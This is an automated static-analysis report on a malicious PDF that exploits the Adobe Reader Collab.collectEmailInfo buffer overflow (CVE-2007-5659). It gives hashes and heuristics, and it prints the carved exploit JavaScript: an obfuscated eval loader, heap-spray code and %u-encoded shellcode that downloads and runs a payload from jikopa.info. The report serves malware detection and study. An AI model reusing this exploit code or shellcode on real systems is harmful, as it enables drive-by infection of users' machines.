Malicious PDF — malware analysis report

Static analysis result for SHA-256 004669320f2b9219…

MALICIOUS

PDF

17.5 KB
MD5: 17e223adc870a5e0beb7716a58237733 SHA-1: 12ad043b70b7b8a0d03042b9760718cad497f407 SHA-256: 004669320f2b92197f6b4f4a282125bd8de61fe787dea63419206ed5db30c320
366 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF contains JavaScript that exploits CVE-2007-5659, targeting specific versions of Adobe Reader. The script is obfuscated and designed as a dropper, indicated by the use of String.fromCharCode for decoding and the embedded URL http://jikopa.info/page/gold.php/n00a106201r0010R43329fdcX9fe725c2Y5576ee99Z0100f080, which is likely used to download a second-stage payload. The presence of multiple anti-analysis checks further supports its malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://jikopa.info/page/gold.php/n00a106201r0010R43329fdcX9fe725c2Y5576ee99Z0100f080 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x4383 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
885781b9dda9f929e5d307a138cdf1cd3182b6a13e3c33e7e2c116c39515e429		 deobfuscated-js z-percent UTF-16BE base-21 decoded JavaScript at offset 0x1AAF 5284 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var y5vCpqXynEO_0n = new Array();var dINK4n = 0;var b4_____r = "";function B7G__q_ca4_6D_r(Tyb_8en, S4P_0m_j0FaF_s){var a227850_m = S4P_0m_j0FaF_s.toString();var l17_3_E_CcLxhd = "";for(var gP5yrcVgVJ_Eg = 0; gP5yrcVgVJ_Eg < a227850_m.length; gP5yrcVgVJ_Eg++) {var cLL32_mM6vwgS = parseInt(a227850_m.substr(gP5yrcVgVJ_Eg, 1));if (!isNaN(cLL32_mM6vwgS)) {cLL32_mM6vwgS = cLL32_mM6vwgS.toString(16);if (cLL32_mM6vwgS.length == 1) { cLL32_mM6vwgS = "0" + cLL32_mM6vwgS; }else if (cLL32_mM6vwgS.length != 2) { cLL32_mM6vwgS = "00"; }l17_3_E_CcLxhd = cLL32_mM6vwgS + l17_3_E_CcLxhd;if (l17_3_E_CcLxhd.length == 8) {break;}}}while(l17_3_E_CcLxhd.length < 8) { l17_3_E_CcLxhd = "0" + l17_3_E_CcLxhd; }var Y_s8RrS__5__04t = Tyb_8en.toString(16);if (Y_s8RrS__5__04t.length == 1) { Y_s8RrS__5__04t = "0" + Y_s8RrS__5__04t; }else if (Y_s8RrS__5__04t.length != 2) { Y_s8RrS__5__04t = "00"; }l17_3_E_CcLxhd = "3" + Y_s8RrS__5__04t + "P" + l17_3_E_CcLxhd;return l17_3_E_CcLxhd;}function t_XCy7l_Kvn(cM1E5H_2nw3jyq, t5FBx_H6){var i_2_T_q = new Array("");var K_wW__a1U = cM1E5H_2nw3jyq;var V_C___88;if ((V_C___88 = cM1E5H_2nw3jyq.lastIndexOf("%u00")) != -1) {if (V_C___88 + 6 == cM1E5H_2nw3jyq.length) {i_2_T_q[0] = cM1E5H_2nw3jyq.substr(V_C___88 + 4, 2);K_wW__a1U = cM1E5H_2nw3jyq.substring(0, V_C___88);}}V_C___88 = 1;for (gP5yrcVgVJ_Eg = 0; gP5yrcVgVJ_Eg < t5FBx_H6.length; gP5yrcVgVJ_Eg++) {var n3P78iwWQ = t5FBx_H6.charCodeAt(gP5yrcVgVJ_Eg).toString(16);if (n3P78iwWQ.length == 1) { n3P78iwWQ = "0" + n3P78iwWQ; }i_2_T_q[V_C___88] = n3P78iwWQ;V_C___88++;}gP5yrcVgVJ_Eg = i_2_T_q[0].length ? 0 : 1;i_2_T_q[V_C___88] = "00";i_2_T_q[V_C___88 + 1] = "00";V_C___88 += 2;if ((i_2_T_q.length - gP5yrcVgVJ_Eg) % 2) {i_2_T_q[V_C___88] = "00";}while(gP5yrcVgVJ_Eg < i_2_T_q.length) {K_wW__a1U += "%u" + i_2_T_q[gP5yrcVgVJ_Eg + 1] + i_2_T_q[gP5yrcVgVJ_Eg];gP5yrcVgVJ_Eg += 2;}K_wW__a1U += "%u0000";return K_wW__a1U;}function qsmRXN6(s_b_S07o, ei7_d45062){while (s_b_S07o.length*2<ei7_d45062) {s_b_S07o += s_b_S07o;}s_b_S07o = s_b_S07o.substring(0,ei7_d45062/2);return s_b_S07o;}function e__Yt__Y(l__R_c, YMmb7MqDOX8, n_gnPNyxn){var Q_0452g____N__q = 0x0c0c0c0c;var s_b_S07o = unescape(YMmb7MqDOX8);var t5FBx_H6 = B7G__q_ca4_6D_r(l__R_c, n_gnPNyxn);var d0JXu_12IQ__q = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var cM1E5H_2nw3jyq = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7170%u7367%u5359%u4a4b%u004c%u7468%u7074%u2f3a%u6a2f%u6b69%u706f%u2e61%u6e69%u6f66%u702f%u6761%u2f65%u6f67%u646c%u702e%u7068%u6e2f%u3030%u3161%u3630%u3032%u7231%u3030%u3031%u3452%u3333%u3932%u6466%u5863%u6639%u3765%u3532%u3263%u3559%u3735%u6536%u3965%u5a39%u3130%u3030%u3066%u3038";app.M3Ul2I = unescape(t_XCy7l_Kvn(cM1E5H_2nw3jyq, t5FBx_H6));var A0_1i0_V = 0x400000;var Auh66___ak1E_W = d0JXu_12IQ__q.length * 2;var ei7_d45062 = A0_1i0_V - (Auh66___ak1E_W+0x38);s_b_S07o = qsmRXN6(s_b_S07o, ei7_d45062);var sFE8FG_voDD_4W0 = (Q_0452g____N__q - 0x400000)/A0_1i0_V;for (var r3w_CoPa = 0; r3w_CoPa < sFE8FG_voDD_4W0; r3w_CoPa++) {y5vCpqXynEO_0n[r3w_CoPa] = s_b_S07o + d0JXu_12IQ__q;}}function x_C__5_lG4(){var M13g36Q2_4 = "
... (truncated)
deobfuscated.js
60296ff02c1cab849aa5804f10eb1e096c6fadc0d65f66bff3793769d741b588		 deobfuscated-js PDF JavaScript deobfuscation pass 125471 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
8k18ag924b976g5e6a021f4a44ba0fagag81aa4d6aahc10886ab64a7ad4c6a2jbc9i98873jb98176729a591f36494c1f3dab1d3g5f5a073k8f62470777811b2b041h8a45114k2i826f9d572fajac3g295039bg3fbf83a41aa78d8k139425929k9e8217ad761e6a0j9b196d872g597eb2580e051a4abf510h0f3f9591115j88bc7i7601907i31269da84c65b78g7gba6h41564a96ajbb2iak32879618961ibf718c52a6724b664700652h0j5h46565f8g75370k56040768513d9e207i2g0d1i3a8j2bag33c08e86605e11bc984j9fb9c26k4e3d45af1i8j7k2bbb4606650e933ha6bj42258197728j5093595754b44318608f9ja41h2a4d4i8j8f1e83049e368i9ga48d041e8jb25a609279657e6b6h32364b9d1f507c9344465a2b2c8j59509a154g3i272eak88b29b3h4529907e7f42379g350b2e0a271e3i59bg18b14i05bk4ga78d688j383a0h6ca967b6bkb489434a4b5ja9506j4jaf1g8f6k22323081791d680f885b751593b41k069g36197g5b8d50124555c33j770788208i3071a1b02g219670a65f06783133646g7i101h1e46196a57781i5e6047a0684a4h8i0e6218383c2715847a08b335851f65ab0j8d7f87ag0e030c4a519i089i2b2d6e1d96666dbg040b9k71bd9j8j90974g6fb02h3c7h2ab37k8g0j9315225hai5788224h14553g840j7i2421c366a827b8777k74bj2h5kaf08387e6j812ibc3k82bj28bc7i375h703a5a290b4j70998c8gc33cb2bc4k4d06413j7k8h2d0430946k40aia1c3b43g885ba6a862211k060d05acah5b7g81aec276213ka87c645e7k0kaj80ab321ga4613f2h09525e66525109b81e6h51ahae3ja277372e9504264gbk38442ja67106b843b69e37073h325i574iaa6g91b1af1h8d8a9a2f8f1f7c1c8aa24g016g6i5h3c17231j90c2715ga550bg17052508076e9a83ahc206bk8k1j4k9d93bk424a0g827j781kb4bg7h9e9d1k567g879d3400ad08a0866kae2ib27j6j926k066d754f0i58520g4b4a3k1c7haa7328b1b74d7b2j203fa9b13b510a7964188e1790bd6k663h2k9a402c2433208573058ba5bi4k019j2e671k6343aa4g05b31b5156aab49230b76d5351031a353aaf1aagag5626357i728i94888k2h69a537a13d0a9e8f796j9492825h9a5f301j8i72413aaf9j755j4b9j3e8f712ab0b5924b59123b830kaa5gbf85659d8f52118f0h0h1316900d2j53bi2gb65iak2c7822929h98781bbc8i0f5ca28iaf484j363d900f34a02ha538a8432a0h4k08b8334j908c4684ak905k222f9d18215dbfa98kb86041474c65b392bc71bj6j6010980cb54g5g827c96546652046c402e5i3a505c9bb65i4e543fc143460d02bi7g0b3h0c58b71b83480c9799746e2gbk0j3b1b1a168d5b296i9a009h92bfc349a665aab15ab3077826aa059k8f209a5g3b3bbe3gba3d7i21aj2d5808498f70168114ab1b6i9514ba479b68bj5a92a35f456i62523b45785bbh4d96bg5h764g05144k3b318kbc542b2a3f0e821d0f1f42608j4j8e35355i5903212a120g1h409e26041ib18k6g139a8kba5213ah6cb966b0a39h722k60474ec1856k59b63a876a113e4c9caf4i571f8b6g6f0a68bc0c005gbgae575c8d50af2k3cb5787h006517771i57ad131gbd80306j259h40413f539b8fab052e5h15556kad1j646c619d5j3d539h405jafbi4b1h0h91921a1k66ad2a4habb66b8h9cafbd9e07691h991387615aab2406a59g304415857b1baf8j87a44i3g6ic3137a316f5b5ca97j452g521e7k860h55065g0g7f0j7dc1b2ae6iac29014b8279033a9i143b6ab5ah746cbg256gbc1bb3742i7g5j2735130k4hb91ca8b01b561ja32a4kb829305g872k263f72333k9jb12h2j3g8i6hbkbb620334b9a2867k9e5bada78137a2255dag8854706b256f5j765hba8e7e7b241b51379058700h1b1j600iag9f45af7k2h1i8dbb4668036g3c30af2f1abc3kc2625g901ebk2i585b9a5h8e8h9j4f6d9882538f1k59037aa24d364h77573ab22f26b1246j9c1k3i23122033081471835h0k0a0dbg99238ebd9b0a484h21b1b53g1b1d9e947g90297g748c6238010i3g9c7d3i8345885f387k8j8c7j53400k3b5c43642h3k1c7h823ebb81af177b33061193ab3g44b6575h50b23j8cb3629676319131322h252c6856235b8db27f93bb03441f6j2g9861190c34757i1680a50h8i3k8961af014a480f11b3086716509i72a389bgbk3399a0379k56b18e6k8174bj9a928a8b341f2e495109078f146g397bc03k9c5j3jbd909e4b59151e8104aj1gb3583f606d4c0d9c3g1j4346b8341c6hc32ga75i9fai5ab66jbf685g0gaf5d1a46b8b70g567h506d5fa928991497159j4d439h358gb92j5gadb174b3bb098f5h38ad0i0j3i7hb88598954k4b688e9fb21i8h30515j158i19813k908c9e73695g690i762825465442566e884i0k6c02b73h21c0ac278j2642224a861e930k1a948j6c611ia404560jaec36k4g47429a098f95c0085c107i16082ja60k5648b2ah92b35266761f298i0g9e2hbaa06h011a3i3k6c930g8c219a4j7ga51fc238c284ac3c907e8f43765e4d2713405b114d60c356765b25217533769e096k43413h0e9016be223k41617i8a371j9559b738151a9k144588bia7660bbc870gah8kbc2j2b9e72b9667j850i622f4i223j9d80975jb23bb82i002f4fa5a04d53ab8h4fag3fa4b53035932j1g5798b48e064h57023986bi983k74bh4gb8ajak1ca742985a9f503938606gaj1e1j537b1b483da9405h574d9f384222a136641a3e3db0ai9b982a0159b12e2jb6ak786179211dbe1c69386aa6b42b1g811b06949g212da68k8fc0169i87a76f517d0b4j6b3i6f8d83028i3ebc3c295d93415i45884e802aa4aeai977310c0b26i5b44953i6ga1152k8bah706i055g9fb05abc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.